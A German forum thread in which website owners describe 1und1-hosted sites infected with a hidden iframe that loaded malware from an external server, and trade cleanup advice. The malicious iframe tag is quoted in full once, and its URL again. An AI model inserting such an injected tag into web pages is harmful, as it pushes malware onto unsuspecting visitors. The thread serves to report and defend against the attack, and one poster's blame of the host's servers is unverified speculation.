Mehrere meiner bei 1und1 gehosteten Websites wurden infiziert - ein iFrame wurde eingeschleust, der folgendermaßen aussieht:
<iframe src="http://xd4.ru:8080/ts/in.cgi?pepsi123" width=125 height=125 style="visibility: hidden"></iframe>
Wird eine infizierte Seite aufgerufen, werden Schadprogramme an den aufrufenden Computer gesendet:
icwsetup.exe, icowin.exe, hp32_nword.exe und andere. Außerdem führt die Infektion zur Google-Idexierung der Seite als Malware belastet.
Kennt jemand das Problem - und hat Lösungen? Danke im voraus.

Hi,

ich halte es für unwahrscheinlich, dass der Server die Webseiten infiziert. Da ich nicht weiß wo das ist, kann ich nicht nachsehen, ich rechne aber damit, dass irgendeine veraltete fehlerhafte Software, z.B. ein Forum, Gästebuch, eine Bildergalerie die Infektionen von außen ermöglicht. Falls Du alle betroffenen Seiten von deinem Computer aus hochlädst kann auch auf dem der Grund liegen. Z.B. ein Keylogger der die FTP-Passwörter abgreift.

Wer die Möglichkeit hat, auf einem Webspace Veränderungen vorzunehmen, der hat auch mehr Möglichkeiten als nur das Einfügen dieser Iframes. Dazu gehören auch beliebige Änderungen an Skripten oder neu hinzugefügte Skripte. Sichere Vorgehensweise ist es, den Webspace komplett zu löschen und eine saubere und nur aktuelle Software enthaltende Version draufzuladen. Ansonsten bleibt vermutlich eine irgendwo versteckte Backdoor unbemerkt, über die der Zugriff auch noch möglich ist, wenn die für den ersten Zugriff genutzte Lücke geschlossen wurde.

Karl

Danke, Karl.
Eine der betroffenen Seiten liegt seit über vier Jahren unangetastet auf dem 1und1-Server. Es sind auch keine Möglichkeiten zur Interaktion auf den Seiten eingebaut. Das ftp-Passwort habe ich sofort geändert, nachdem ich den Zugriff entdeckt hatte. Vor vier Tagen war das, seither repariere ich per Hand die infizierten index-Seiten. Das hällt in der Regel vier bis acht Stunden. Dann geht der Wahnsinn wieder los. Ich habe an den 1und1-Support geschrieben. Vielleicht haben die eine Lösung.
Eine Frage zum Abschluss: Da immer nur die index-Seiten angegriffen werden, gibt es eine Möglichkeit, über die Domain-Anwahl auf eine andere Startseite (xyz.html) zuzugreifen?
Peter.

Kannst Du Logs bekommen? Logs für die Zugriffe auf den Webserver und Zugriffe auf den FTP? Wäre gut, dann kannst Du dich darin umsehen, ob da drin steht, wie es funktioniert.

Wegen Wechsel von index.html auf xyz.html bin ich überfragt.

Wenn Du magst kannst Du mir die betreffenden Seitenadressen per PN schicken.

Die von 1und1 vorgeschlagenen Maßnahmen entsprechen im Wesentlichen deinen Vorschlägen: sauberes Backup und vor allem sämtliche Passwörter austauschen. Da es sich um immerhin 12 Webauftritte handelt, wurde das Reinigungsmanöver zum Nachtmarathon. Bei der Überprüfung gerade eben: keine Probleme mehr. 1und1 hat mir deutlich zu verstehen gegeben, dass meine Passwortauswahl Kinderkram gewesen sein muss (sechsstellige Wörter, keine Ziffern) und daher leicht zu knacken. Ich habe dazugelernt. Noch mal danke.

hi @all.

hab das selbe problem mit 1und1 seit ca. Januar. hab ein profi hosting paket bei 1und1 mit 7 webseiten.

wenn ich alle index.htm* datein auf dem server nicht auf "read only" setze, werden sie nach ca. 5-8h mit malware verseucht. und das ist noch ziemlich nervig wenn man einen webshop laufen hat, der für jede kategorie eine index anlegt.

z.B. http://xd4.ru:8080/ts/in.cgi?pepsi123 und noch paar anderen.

Die "Read-Only" Methode ging bis vor ca. 1 Woche gut. Nun scheinen die einen anderen weg gefunden zu haben und platzieren eine .htaccess datei aufm server. so das die seite nicht mehr erreichbar ist und sie können nun die index.html oder main.html dateien komplett ersetzen, trotz "ready-only".

Schon 10x an 1und1 Support geschrieben, jedesmla nur eine standart anwort von wegen , ich soll meine PCs überprüfen.... aber alle PCs sind 100% sauber.

Auch wurden die passwörter (20 stellig buchstaben/zahlen) schon 10x von mir geändert und auch bei den 1und1 Log dateien, ist kein ftp/webzugriff auf die manipulierten dateien zu finden. Also kann es nur direkt bei 1und1 auf dem Server die Malware Source liegen.

Wir werden jetzt 1und1 verlassen und zu einem anderen Anbieter gehen, wir haben die Schnauze voll.



F*** YOU 1und1 und euren NICHTVORHANDENEN SUPPORT !